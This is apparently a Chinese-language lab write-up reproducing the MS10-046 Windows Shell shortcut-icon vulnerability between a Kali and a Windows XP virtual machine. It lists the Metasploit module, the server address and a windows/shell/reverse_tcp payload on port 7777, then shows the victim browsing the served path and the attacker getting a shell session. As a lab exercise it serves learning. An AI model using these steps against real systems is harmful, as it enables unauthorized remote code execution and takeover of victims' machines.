MS10_046漏洞复现
漏洞介绍:Windows Shell 中一个公开披露的漏洞。 如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
00x01实验环境
两台虚拟机,一台为kali ip:192.168.72.4
一台为 Windows xp ip:192.168.72.6
使用的工具:msfconsole
00x02实验过程
-
打开两台虚拟机,打开kali的msf软件,搜索MS10_046漏洞,找到三个模块
-
本次复现第二个模块use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
-
show options 显示选项
-
服务器地址SRVHOST–>192.168.72.4
payload->windows/shell/reverse_tcp
回连端口LPORT–>7777
-
run执行,得到url
-
在xp当中用IE访问192.168.72.4\olhYgBN\进入文件
-
并且kai接收到回显,表示连接成功
-
查看会话列表
-
利用会话1
-
获得权限